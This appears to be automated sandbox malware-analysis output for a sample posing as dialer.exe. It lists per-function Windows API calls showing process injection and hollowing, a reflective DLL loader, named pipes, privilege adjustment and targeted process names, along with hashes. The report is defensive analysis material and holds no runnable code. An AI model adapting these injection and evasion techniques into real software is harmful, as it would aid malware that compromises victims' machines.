Part of subcall function 00007FF62DC319AC: OpenProcess.KERNEL32(?,?,?,00007FF62DC3110E), ref: 00007FF62DC319CA
Part of subcall function 00007FF62DC319AC: IsWow64Process.KERNEL32(?,?,?,00007FF62DC3110E), ref: 00007FF62DC319E0
Part of subcall function 00007FF62DC319AC: CloseHandle.KERNELBASE(?,?,?,00007FF62DC3110E), ref: 00007FF62DC319FB

OpenProcess.KERNEL32 ref: 00007FF62DC3112C
OpenProcess.KERNEL32 ref: 00007FF62DC3114B
K32GetModuleFileNameExW.KERNEL32 ref: 00007FF62DC31170
PathFindFileNameW.SHLWAPI ref: 00007FF62DC3117E
lstrlenW.KERNEL32 ref: 00007FF62DC3118A
StrCpyW.SHLWAPI ref: 00007FF62DC311A1
CloseHandle.KERNEL32 ref: 00007FF62DC311AD
StrCmpIW.SHLWAPI ref: 00007FF62DC311ED
NtQueryInformationProcess.NTDLL ref: 00007FF62DC31221
OpenProcessToken.ADVAPI32 ref: 00007FF62DC3124B
GetTokenInformation.KERNELBASE ref: 00007FF62DC31277
GetLastError.KERNEL32 ref: 00007FF62DC31281
LocalAlloc.KERNEL32 ref: 00007FF62DC31294
GetTokenInformation.KERNELBASE ref: 00007FF62DC312C0
GetSidSubAuthorityCount.ADVAPI32 ref: 00007FF62DC312CD
GetSidSubAuthority.ADVAPI32 ref: 00007FF62DC312DC
LocalFree.KERNEL32 ref: 00007FF62DC312F4
CloseHandle.KERNEL32 ref: 00007FF62DC31308
StrStrA.SHLWAPI ref: 00007FF62DC313B2
VirtualAllocEx.KERNELBASE ref: 00007FF62DC31419
WriteProcessMemory.KERNELBASE ref: 00007FF62DC3143C
WaitForSingleObject.KERNEL32 ref: 00007FF62DC31488
GetExitCodeThread.KERNEL32 ref: 00007FF62DC3149E
CloseHandle.KERNELBASE ref: 00007FF62DC314B6
CloseHandle.KERNEL32 ref: 00007FF62DC314BF

Strings

ReflectiveDllMain, xrefs: 00007FF62DC313A8
dialer.exe, xrefs: 00007FF62DC311D8
WmiPrvSE.exe, xrefs: 00007FF62DC311CC
@, xrefs: 00007FF62DC3140C
MSBuild.exe, xrefs: 00007FF62DC311B8

Memory Dump Source

Source File: 00000014.00000002.2606531009.00007FF62DC31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF62DC30000, based on PE: true

Associated: 00000014.00000002.2606487222.00007FF62DC30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606565603.00007FF62DC33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606604026.00007FF62DC36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff62dc30000_dialer.jbxd

Similarity

API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
String ID: @$MSBuild.exe$ReflectiveDllMain$WmiPrvSE.exe$dialer.exe
API String ID: 2561231171-2835194517
Opcode ID: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
Instruction ID: f22b3f57e6180f36c2e85c6cda8b3e66aa3999032919003ff477601c00e2dd5e
Opcode Fuzzy Hash: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
Instruction Fuzzy Hash: 6FB14F75B086428AEF909B199C806F937B9FB84B85F008135DA8E87754EF3CE546C751

Function 00007FF62DC314E4 Relevance: 19.6, APIs: 13, Instructions: 130
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF62DC31517
HeapAlloc.KERNEL32 ref: 00007FF62DC3152A
GetProcessHeap.KERNEL32 ref: 00007FF62DC31538
HeapAlloc.KERNEL32 ref: 00007FF62DC31549
K32EnumProcesses.KERNEL32 ref: 00007FF62DC31563
OpenProcess.KERNEL32 ref: 00007FF62DC31591
K32EnumProcessModules.KERNEL32 ref: 00007FF62DC315B6
ReadProcessMemory.KERNELBASE ref: 00007FF62DC315ED
CloseHandle.KERNELBASE ref: 00007FF62DC31629
GetProcessHeap.KERNEL32 ref: 00007FF62DC3163B
RtlFreeHeap.NTDLL ref: 00007FF62DC31649
GetProcessHeap.KERNEL32 ref: 00007FF62DC3164F
RtlFreeHeap.NTDLL ref: 00007FF62DC3165D

Memory Dump Source

Source File: 00000014.00000002.2606531009.00007FF62DC31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF62DC30000, based on PE: true

Associated: 00000014.00000002.2606487222.00007FF62DC30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606565603.00007FF62DC33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606604026.00007FF62DC36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff62dc30000_dialer.jbxd

Similarity

API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
String ID:
API String ID: 4084875642-0
Opcode ID: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
Instruction ID: 144550923825d5f315c909dc436b0f7d246734c579053709439bf6483d95fb42
Opcode Fuzzy Hash: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
Instruction Fuzzy Hash: 1951AE32B156828AEFA1CFAAEC446E932B8FB89B94F444034DE4D87754EE3CD456C711

Function 00007FF62DC31C64 Relevance: 9.1, APIs: 6, Instructions: 88
memorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 00007FF62DC31CB3
SetEntriesInAclW.ADVAPI32 ref: 00007FF62DC31D14
LocalAlloc.KERNEL32 ref: 00007FF62DC31D24
InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF62DC31D3A
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF62DC31D52
CreateNamedPipeW.KERNELBASE ref: 00007FF62DC31D94

Memory Dump Source

Source File: 00000014.00000002.2606531009.00007FF62DC31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF62DC30000, based on PE: true

Associated: 00000014.00000002.2606487222.00007FF62DC30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606565603.00007FF62DC33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606604026.00007FF62DC36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff62dc30000_dialer.jbxd

Similarity

API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
String ID:
API String ID: 3197395349-0
Opcode ID: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
Instruction ID: 5db18040b38e202fcebb5b29f818ae894604fd5631a2e09ffbf91149befafd2c
Opcode Fuzzy Hash: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
Instruction Fuzzy Hash: C4416F32B14A518EDB90CF28E8807E937B4FB45758F40113AEA4D87B98EF78D509CB50

Function 00007FF62DC32078 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 128
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCpyW.SHLWAPI ref: 00007FF62DC320AA
StrCatW.SHLWAPI ref: 00007FF62DC320B8
GetModuleHandleW.KERNEL32 ref: 00007FF62DC320C1
GetCurrentProcess.KERNEL32 ref: 00007FF62DC3210C
K32GetModuleInformation.KERNEL32 ref: 00007FF62DC32120
CreateFileW.KERNELBASE ref: 00007FF62DC32150
CreateFileMappingW.KERNELBASE ref: 00007FF62DC3217B
MapViewOfFile.KERNELBASE ref: 00007FF62DC3219F
lstrcmpiA.KERNEL32 ref: 00007FF62DC321EA
VirtualProtect.KERNELBASE ref: 00007FF62DC32221
VirtualProtect.KERNELBASE ref: 00007FF62DC3224F
CloseHandle.KERNELBASE ref: 00007FF62DC32258
CloseHandle.KERNEL32 ref: 00007FF62DC32261
FreeLibrary.KERNEL32 ref: 00007FF62DC3226A

Strings

.text, xrefs: 00007FF62DC321E3
C:\Windows\System32\, xrefs: 00007FF62DC3209B

Memory Dump Source

Source File: 00000014.00000002.2606531009.00007FF62DC31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF62DC30000, based on PE: true

Associated: 00000014.00000002.2606487222.00007FF62DC30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606565603.00007FF62DC33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606604026.00007FF62DC36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff62dc30000_dialer.jbxd

Similarity

API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
String ID: .text$C:\Windows\System32\
API String ID: 2721474350-832442975
Opcode ID: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
Instruction ID: b8feeb8905108e24251771cb3b2b7cca2c4171a49e391c80e45520caddac987e
Opcode Fuzzy Hash: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
Instruction Fuzzy Hash: 2C51713570868282EFA19B19EC586AAB378FBC5B94F444131DE8D47798EF3DD40AC721

Function 00007FF62DC32D84 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
sleepfilepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF62DC31C64: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF62DC31CB3
Part of subcall function 00007FF62DC31C64: SetEntriesInAclW.ADVAPI32 ref: 00007FF62DC31D14
Part of subcall function 00007FF62DC31C64: LocalAlloc.KERNEL32 ref: 00007FF62DC31D24
Part of subcall function 00007FF62DC31C64: InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF62DC31D3A
Part of subcall function 00007FF62DC31C64: SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF62DC31D52
Part of subcall function 00007FF62DC31C64: CreateNamedPipeW.KERNELBASE ref: 00007FF62DC31D94

Sleep.KERNEL32 ref: 00007FF62DC32DA9
ConnectNamedPipe.KERNELBASE ref: 00007FF62DC32DB6
ReadFile.KERNELBASE ref: 00007FF62DC32DD9
WriteFile.KERNEL32 ref: 00007FF62DC32E07
Sleep.KERNEL32 ref: 00007FF62DC32E14
DisconnectNamedPipe.KERNELBASE ref: 00007FF62DC32E1D

Strings

M, xrefs: 00007FF62DC32DFA
\\.\pipe\dialerchildproc64, xrefs: 00007FF62DC32D91

Memory Dump Source

Source File: 00000014.00000002.2606531009.00007FF62DC31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF62DC30000, based on PE: true

Associated: 00000014.00000002.2606487222.00007FF62DC30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606565603.00007FF62DC33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606604026.00007FF62DC36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff62dc30000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
String ID: M$\\.\pipe\dialerchildproc64
API String ID: 2203880229-3489460547
Opcode ID: 7d22ea23ef86ef8925f3c0e3dc4e470fe94490edd279db0f7d690e2db9d12c90
Instruction ID: 019d44e31e4efc1ff0ff1927186abbecd3acd0c1679326d3146885869beee44b
Opcode Fuzzy Hash: 7d22ea23ef86ef8925f3c0e3dc4e470fe94490edd279db0f7d690e2db9d12c90
Instruction Fuzzy Hash: 14117721B1868291EE54DB15EC143F9B374EB85BA1F048234D59E826D4EF7CE409C762

Function 00007FF62DC3228C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
sleeppipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF62DC31C64: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF62DC31CB3
Part of subcall function 00007FF62DC31C64: SetEntriesInAclW.ADVAPI32 ref: 00007FF62DC31D14
Part of subcall function 00007FF62DC31C64: LocalAlloc.KERNEL32 ref: 00007FF62DC31D24
Part of subcall function 00007FF62DC31C64: InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF62DC31D3A
Part of subcall function 00007FF62DC31C64: SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF62DC31D52
Part of subcall function 00007FF62DC31C64: CreateNamedPipeW.KERNELBASE ref: 00007FF62DC31D94

Sleep.KERNEL32 ref: 00007FF62DC322B1
ConnectNamedPipe.KERNELBASE ref: 00007FF62DC322BE
ReadFile.KERNEL32 ref: 00007FF62DC322E1
Sleep.KERNEL32 ref: 00007FF62DC32302
DisconnectNamedPipe.KERNEL32 ref: 00007FF62DC3230B

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 00007FF62DC32299

Memory Dump Source

Source File: 00000014.00000002.2606531009.00007FF62DC31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF62DC30000, based on PE: true

Associated: 00000014.00000002.2606487222.00007FF62DC30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606565603.00007FF62DC33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606604026.00007FF62DC36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff62dc30000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 2071455217-3440882674
Opcode ID: 5695317b32aa55875ab713aa7e4462bbb3149900d195a386a470b0f830d0d176
Instruction ID: 4e3746c0f3ff31da5fb7a322c18d09fa20a81cfffda5db28d19ba49973cf7b10
Opcode Fuzzy Hash: 5695317b32aa55875ab713aa7e4462bbb3149900d195a386a470b0f830d0d176
Instruction Fuzzy Hash: A3015621B0C68291EE949B19FC042F9B378AF81BB1F54C234D65B866D4EF7CD449C722

Function 00007FF62DC32CC0 Relevance: 9.1, APIs: 6, Instructions: 58
memorysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF62DC32CDB
HeapAlloc.KERNEL32 ref: 00007FF62DC32CEF
GetProcessHeap.KERNEL32 ref: 00007FF62DC32CF8
HeapAlloc.KERNEL32 ref: 00007FF62DC32D06
K32EnumProcesses.KERNEL32 ref: 00007FF62DC32D21
Sleep.KERNEL32 ref: 00007FF62DC32D79

Memory Dump Source

Source File: 00000014.00000002.2606531009.00007FF62DC31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF62DC30000, based on PE: true

Associated: 00000014.00000002.2606487222.00007FF62DC30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606565603.00007FF62DC33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606604026.00007FF62DC36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff62dc30000_dialer.jbxd

Similarity

API ID: Heap$AllocProcess$EnumProcessesSleep
String ID:
API String ID: 3676546796-0
Opcode ID: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
Instruction ID: 5b5bfa9f99b7ab9306b15aff168daf432fa35f0339020ad3434f5551dfd7ecfc
Opcode Fuzzy Hash: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
Instruction Fuzzy Hash: 3D21A731B0964247EB948B1AEC545BAB675FBC2B81F108038CA4A47768EF3DE442CB51

Function 00007FF62DC317F8 Relevance: 9.1, APIs: 6, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF62DC3180D
HeapAlloc.KERNEL32 ref: 00007FF62DC3181E

Part of subcall function 00007FF62DC314E4: GetProcessHeap.KERNEL32 ref: 00007FF62DC31517
Part of subcall function 00007FF62DC314E4: HeapAlloc.KERNEL32 ref: 00007FF62DC3152A
Part of subcall function 00007FF62DC314E4: GetProcessHeap.KERNEL32 ref: 00007FF62DC31538
Part of subcall function 00007FF62DC314E4: HeapAlloc.KERNEL32 ref: 00007FF62DC31549
Part of subcall function 00007FF62DC314E4: K32EnumProcesses.KERNEL32 ref: 00007FF62DC31563
Part of subcall function 00007FF62DC314E4: OpenProcess.KERNEL32 ref: 00007FF62DC31591
Part of subcall function 00007FF62DC314E4: K32EnumProcessModules.KERNEL32 ref: 00007FF62DC315B6
Part of subcall function 00007FF62DC314E4: ReadProcessMemory.KERNELBASE ref: 00007FF62DC315ED
Part of subcall function 00007FF62DC314E4: CloseHandle.KERNELBASE ref: 00007FF62DC31629
Part of subcall function 00007FF62DC314E4: GetProcessHeap.KERNEL32 ref: 00007FF62DC3163B
Part of subcall function 00007FF62DC314E4: RtlFreeHeap.NTDLL ref: 00007FF62DC31649
Part of subcall function 00007FF62DC314E4: GetProcessHeap.KERNEL32 ref: 00007FF62DC3164F
Part of subcall function 00007FF62DC314E4: RtlFreeHeap.NTDLL ref: 00007FF62DC3165D

OpenProcess.KERNEL32 ref: 00007FF62DC31865
TerminateProcess.KERNEL32 ref: 00007FF62DC31878
CloseHandle.KERNEL32 ref: 00007FF62DC31881
GetProcessHeap.KERNEL32 ref: 00007FF62DC31891

Memory Dump Source

Source File: 00000014.00000002.2606531009.00007FF62DC31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF62DC30000, based on PE: true

Associated: 00000014.00000002.2606487222.00007FF62DC30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606565603.00007FF62DC33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606604026.00007FF62DC36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff62dc30000_dialer.jbxd

Similarity

API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
String ID:
API String ID: 1323846700-0
Opcode ID: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
Instruction ID: cbc91fc6bff0fa2d437bbbbffb4fcbd119785817d2d9f24a9568f9c7e442ce7a
Opcode Fuzzy Hash: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
Instruction Fuzzy Hash: 45117221F0964286EF989B5AEC000B967B5EFCAB94F098134DD4D83755EE3DD4428712

Function 00007FF62DC319AC Relevance: 4.5, APIs: 3, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(?,?,?,00007FF62DC3110E), ref: 00007FF62DC319CA
IsWow64Process.KERNEL32(?,?,?,00007FF62DC3110E), ref: 00007FF62DC319E0
CloseHandle.KERNELBASE(?,?,?,00007FF62DC3110E), ref: 00007FF62DC319FB

Memory Dump Source

Source File: 00000014.00000002.2606531009.00007FF62DC31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF62DC30000, based on PE: true

Associated: 00000014.00000002.2606487222.00007FF62DC30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606565603.00007FF62DC33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606604026.00007FF62DC36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff62dc30000_dialer.jbxd

Similarity

API ID: Process$CloseHandleOpenWow64
String ID:
API String ID: 10462204-0
Opcode ID: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
Instruction ID: 1a069b86f1e3873b09eef5834876ea8c5036df441d477b9b24902ef4ba4bf572
Opcode Fuzzy Hash: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
Instruction Fuzzy Hash: 53F09031B0878283EF948F1AB8841A96274FB89BC1F448038EE8D83748EF3CD446CB00

Function 00007FF62DC32314 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF62DC32328: VerSetConditionMask.NTDLL ref: 00007FF62DC32397
Part of subcall function 00007FF62DC32328: VerSetConditionMask.NTDLL ref: 00007FF62DC323A8
Part of subcall function 00007FF62DC32328: VerSetConditionMask.NTDLL ref: 00007FF62DC323B9
Part of subcall function 00007FF62DC32328: VerifyVersionInfoW.KERNEL32 ref: 00007FF62DC323CC
Part of subcall function 00007FF62DC32328: GetCurrentProcessId.KERNEL32 ref: 00007FF62DC323DE
Part of subcall function 00007FF62DC32328: OpenProcess.KERNEL32 ref: 00007FF62DC323EE
Part of subcall function 00007FF62DC32328: OpenProcessToken.ADVAPI32 ref: 00007FF62DC3240F
Part of subcall function 00007FF62DC32328: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF62DC32429
Part of subcall function 00007FF62DC32328: AdjustTokenPrivileges.KERNELBASE ref: 00007FF62DC3246D
Part of subcall function 00007FF62DC32328: GetLastError.KERNEL32 ref: 00007FF62DC32477
Part of subcall function 00007FF62DC32328: CloseHandle.KERNELBASE ref: 00007FF62DC32480
Part of subcall function 00007FF62DC32328: FindResourceExA.KERNEL32 ref: 00007FF62DC32494
Part of subcall function 00007FF62DC32328: SizeofResource.KERNEL32 ref: 00007FF62DC324AB
Part of subcall function 00007FF62DC32328: LoadResource.KERNEL32 ref: 00007FF62DC324C4
Part of subcall function 00007FF62DC32328: LockResource.KERNEL32 ref: 00007FF62DC324D6
Part of subcall function 00007FF62DC32328: GetCurrentProcessId.KERNEL32 ref: 00007FF62DC324E3

ExitProcess.KERNEL32 ref: 00007FF62DC3231F

Memory Dump Source

Source File: 00000014.00000002.2606531009.00007FF62DC31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF62DC30000, based on PE: true

Associated: 00000014.00000002.2606487222.00007FF62DC30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606565603.00007FF62DC33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606604026.00007FF62DC36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff62dc30000_dialer.jbxd

Similarity

API ID: Process$Resource$ConditionMask$CurrentOpenToken$AdjustCloseErrorExitFindHandleInfoLastLoadLockLookupPrivilegePrivilegesSizeofValueVerifyVersion
String ID:
API String ID: 2329183550-0
Opcode ID: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
Instruction ID: 4d4fa3fa3c41f944ec8301d86eef8a6c8781ec2e124e72d105924bfc3c0df005
Opcode Fuzzy Hash: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
Instruction Fuzzy Hash: 31A00210F1968141DD8937796C550AC51795F95601B505434D04595155EE1C54564732

Non-executed Functions

Function 00007FF62DC326E8 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 292
memoryregistryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32 ref: 00007FF62DC3276B

Part of subcall function 00007FF62DC319AC: OpenProcess.KERNEL32(?,?,?,00007FF62DC3110E), ref: 00007FF62DC319CA
Part of subcall function 00007FF62DC319AC: IsWow64Process.KERNEL32(?,?,?,00007FF62DC3110E), ref: 00007FF62DC319E0
Part of subcall function 00007FF62DC319AC: CloseHandle.KERNELBASE(?,?,?,00007FF62DC3110E), ref: 00007FF62DC319FB

Part of subcall function 00007FF62DC310C0: OpenProcess.KERNEL32 ref: 00007FF62DC3112C
Part of subcall function 00007FF62DC310C0: OpenProcess.KERNEL32 ref: 00007FF62DC3114B
Part of subcall function 00007FF62DC310C0: K32GetModuleFileNameExW.KERNEL32 ref: 00007FF62DC31170
Part of subcall function 00007FF62DC310C0: PathFindFileNameW.SHLWAPI ref: 00007FF62DC3117E
Part of subcall function 00007FF62DC310C0: lstrlenW.KERNEL32 ref: 00007FF62DC3118A
Part of subcall function 00007FF62DC310C0: StrCpyW.SHLWAPI ref: 00007FF62DC311A1
Part of subcall function 00007FF62DC310C0: CloseHandle.KERNEL32 ref: 00007FF62DC311AD
Part of subcall function 00007FF62DC310C0: StrCmpIW.SHLWAPI ref: 00007FF62DC311ED
Part of subcall function 00007FF62DC310C0: NtQueryInformationProcess.NTDLL ref: 00007FF62DC31221
Part of subcall function 00007FF62DC310C0: OpenProcessToken.ADVAPI32 ref: 00007FF62DC3124B

RegOpenKeyExW.ADVAPI32 ref: 00007FF62DC32807
RegDeleteValueW.ADVAPI32 ref: 00007FF62DC3281F
ExitProcess.KERNEL32 ref: 00007FF62DC32843
GetProcessHeap.KERNEL32 ref: 00007FF62DC3284A
HeapAlloc.KERNEL32 ref: 00007FF62DC3285D
K32EnumProcesses.KERNEL32 ref: 00007FF62DC3287A
ExitProcess.KERNEL32 ref: 00007FF62DC3291A

Strings

open, xrefs: 00007FF62DC32AEC
dialerstager, xrefs: 00007FF62DC32818
SOFTWARE, xrefs: 00007FF62DC327F9

Memory Dump Source

Source File: 00000014.00000002.2606531009.00007FF62DC31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF62DC30000, based on PE: true

Associated: 00000014.00000002.2606487222.00007FF62DC30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606565603.00007FF62DC33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606604026.00007FF62DC36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff62dc30000_dialer.jbxd

Similarity

API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
String ID: SOFTWARE$dialerstager$open
API String ID: 3276259517-3931493855
Opcode ID: cc2dfd10ca6ce89d0433c572e31964bbe7f0f3f3498935daffa8bcdb63cf822c
Instruction ID: 4e3d51bf21117c98a2dcf0ce3416351c5346a3ca19c458bf51222525f6767129
Opcode Fuzzy Hash: cc2dfd10ca6ce89d0433c572e31964bbe7f0f3f3498935daffa8bcdb63cf822c
Instruction Fuzzy Hash: D2D14221B086C28AFFB59F2D9C042F9A279FF44744F018135E50E86699EE3CE606C762

Function 00007FF62DC31DB4 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162
injectionthreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32 ref: 00007FF62DC31E78
VirtualAllocEx.KERNEL32 ref: 00007FF62DC31EA7
WriteProcessMemory.KERNEL32 ref: 00007FF62DC31ECC
WriteProcessMemory.KERNEL32 ref: 00007FF62DC31F08
VirtualAlloc.KERNEL32 ref: 00007FF62DC31F3B
GetThreadContext.KERNEL32 ref: 00007FF62DC31F57
WriteProcessMemory.KERNEL32 ref: 00007FF62DC31F7F
SetThreadContext.KERNEL32 ref: 00007FF62DC31F9D
ResumeThread.KERNEL32 ref: 00007FF62DC31FAD
OpenProcess.KERNEL32 ref: 00007FF62DC31FCC
TerminateProcess.KERNEL32 ref: 00007FF62DC31FDC

Strings

@, xrefs: 00007FF62DC31E9F

Memory Dump Source

Source File: 00000014.00000002.2606531009.00007FF62DC31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF62DC30000, based on PE: true

Associated: 00000014.00000002.2606487222.00007FF62DC30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606565603.00007FF62DC33000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000014.00000002.2606604026.00007FF62DC36000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff62dc30000_dialer.jbxd

Similarity

API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
String ID: @
API String ID: 3462610200-2766056989
Opcode ID: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
Instruction ID: 2209ebc157651efa5a81710c018de7ec805cba17947453eb26e749cd6e5523a9
Opcode Fuzzy Hash: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
Instruction Fuzzy Hash: 40617132B04A018AEB908F6ADC407AD77B9FB89B88F004135DE4D97758EF38E546C761

Function 00007FF62DC31AC4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106memorycomCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF62DC31AEB
SysAllocString.OLEAUT32 ref: 00007FF62DC31AFB
CoInitializeEx.OLE32 ref: 00007FF62DC31B08
CoInitializeSecurity.OLE32 ref: 00007FF62DC31B3F
CoCreateInstance.OLE32 ref: 00007FF62DC31B84
VariantInit.OLEAUT32 ref: 00007FF62DC31B96
CoUninitialize.OLE32 ref: 00007FF62DC31C2F
SysFreeString.OLEAUT32 ref: 00007FF62DC31C38
SysFreeString.OLEAUT32 ref: 00007FF62DC31C41

Strings

